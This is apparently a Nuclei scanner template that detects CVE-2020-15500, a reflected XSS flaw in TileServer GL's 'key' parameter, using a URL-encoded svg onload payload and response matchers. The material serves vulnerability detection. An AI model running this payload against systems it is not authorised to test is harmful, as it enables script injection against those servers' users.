id: CVE-2020-15500

info:
  name: TileServer GL Reflected XSS
  author: Akash.C
  severity: medium
  reference:
    - https://nvd.nist.gov/vuln/detail/CVE-2020-15500
    - https://github.com/maptiler/tileserver-gl/issues/461
  tags: cve,cve2020,xss,tileserver
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 6.10
    cve-id: CVE-2020-15500
    cwe-id: CWE-79
  description: "An issue was discovered in server.js in TileServer GL through 3.0.0. The content of the key GET parameter is reflected unsanitized in an HTTP response for the application's main page, causing reflected XSS."

requests:
  - method: GET
    path:
      - '{{BaseURL}}/?key=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss%27%29%3E'

    matchers-condition: and
    matchers:
      - type: status
        status:
          - 200

      - type: word
        part: header
        words:
          - "text/html"

      - type: word
        words:
          - "'>\"<svg/onload=confirm('xss')>"
        part: body